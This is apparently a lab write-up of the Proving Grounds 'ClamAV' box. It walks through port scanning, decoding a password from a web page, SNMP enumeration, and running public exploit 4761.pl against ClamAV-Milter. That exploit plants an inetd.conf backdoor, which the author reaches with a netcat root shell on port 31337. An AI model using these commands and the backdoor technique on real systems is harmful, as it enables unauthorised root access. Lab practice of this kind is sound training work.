Post

Proving Grounds - ClamAV

ClamAV was an insightful box to explore exploitation techniques for services like ClamAV-Milter.

The process started with comprehensive information gathering, including a full port scan revealing various open ports.

The HTTP enumeration led to identifying and decoding a binary message, providing a potential password.

Enumeration of SNMP services helped identify the running ClamAV-Milter service.

The exploitation phase involved searching for relevant exploits and utilizing a Perl script to create a backdoor by modifying the /etc/inetd.conf file, which enabled root shell access through a netcat connection on a specified port.

Diagram

graph TD
    A[Information Gathering] -->|Port Scan| B[Enumeration]
    B --> C[HTTP 80]
    C --> |Find Binary Info| D[Decode Binary]
    B --> F[SNMP 199 & 25]
    F --> G[Identify ClamAV-Milter]
    G --> H[Exploit ClamAV-Milter] --> |Execute Perl Script| I[Root Shell]

Information Gathering

IP=192.168.184.42

Port scan


  • nmap -sS -Pn -n -T4 --open $IP

    Untitled

  • nmap -sS -Pn -n -T4 --open -p- $IP - new port 6000

    Untitled

  • nmap -sVC -Pn -n -p 22,25,80,139,199,445,60000 $IP

    Untitled

Enumeration

HTTP 80


  • http://192.168.184.42/ → Info in binary. Also the title is called Ph33r, looks like an User.

    Untitled

  • translating binary - ifyoudontpwnmeuran00b - Looks like an password

    Untitled

  • feroxbuster -u http://$IP -k -C 404,403,500,502 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -X .php -t 100

    Untitled

SNMP 199 & 25


  • snmpwalk -c public -v1 $IP - Nothing useful

    Untitled

  • snmp-check $IP -c public

    Untitled

    Untitled

It’s running ClamAV-Milter

1
3782 runnable clamav-milter /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl

Exploitation

ClamAV


Now searching for scripts for ClamAV-Milter

  • searchsploit ClamAV-MilterOnly in perl

    Untitled

  • cat 4761.pl

    Untitled

This script exploits a vulnerability in Sendmail when used with ClamAV’s milter to append a malicious command to /etc/inetd.conf, effectively creating a backdoor that grants root access via a shell on a specified TCP port (31337). The script then restarts the inetd service to activate the backdoor.

  • perl 4761.pl $IP

    Untitled

  • nc $IP 31337 /bin/sh -i

    Untitled

  • flag

    Untitled

This post is licensed under CC BY 4.0 by the author.